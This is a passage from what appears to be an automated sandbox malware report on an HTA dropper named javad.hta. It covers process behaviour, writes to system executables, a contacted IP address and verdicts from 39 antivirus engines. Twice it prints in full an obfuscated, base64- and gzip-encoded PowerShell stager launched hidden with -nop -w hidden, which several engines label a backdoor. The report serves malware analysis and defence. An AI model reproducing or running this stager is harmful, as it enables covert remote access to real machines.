System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000458	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x05620000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 16, 2024, 2:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Oct. 16, 2024, 2:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

86.104.74.31

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Creates a suspicious Powershell process (6 events)

option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 39 AntiVirus engines on VirusTotal as malicious (39 events)

Lionic	Trojan.Script.Agent.4!c
Cynet	Malicious (score: 99)
CTX	txt.trojan.generic
CAT-QuickHeal	Script.Trojan.42447
Skyhigh	BehavesLike.HTML.Dropper.zr
ALYac	Trojan.Script.905440
VIPRE	Trojan.Script.905440
Sangfor	Malware.Generic-VBS.Save.facd9283
Arcabit	Trojan.Script.DDD0E0
Baidu	VBS.Trojan-Downloader.Agent.va
Symantec	VBS.Heur.SNIC
ESET-NOD32	VBS/Agent.NUI
Avast	VBS:Obfuscated-GQ [Cryp]
ClamAV	Vbs.Backdoor.Msfvenom_Payload-9951533-0
Kaspersky	HEUR:Trojan.VBS.Agent.gen
BitDefender	Trojan.Script.905440
NANO-Antivirus	Trojan.Html.Downloader.fqlyhy
MicroWorld-eScan	Trojan.Script.905440
Rising	Dropper.Ploty!8.EEC8 (TOPIS:E0:Q0eCX8vJheP)
Emsisoft	Trojan.Script.905440 (B)
F-Secure	Backdoor:HTML/PowerShellStager.A
DrWeb	Trojan.Siggen28.55374
Sophos	Mal/PSDL-B
Ikarus	Trojan.PowerShell.Agent
FireEye	Trojan.Script.905440
Google	Detected
Avira	VBS/PSRunner.VPA
Kingsoft	Win32.Infected.AutoInfector.a
Xcitium	TrojWare.VBS.Agent.NUI@8a4oj4
Microsoft	TrojanDropper:VBS/PSRunner.G!MSR
ZoneAlarm	HEUR:Trojan.VBS.Agent.gen
GData	Trojan.Script.905440
Varist	VBS/Agent.AXB!Eldorado
McAfee	PS/Injector.d
Tencent	Heur:Trojan.Powershell.Generic.d
huorong	Trojan/HTML.Agent.a
Fortinet	VBS/Inject.B!tr
AVG	VBS:Obfuscated-GQ [Cryp]
alibabacloud	Trojan:Win/PSRunner.G9OHT

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	86.104.74.31:1911
dead_host	192.168.56.101:49166

javad.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All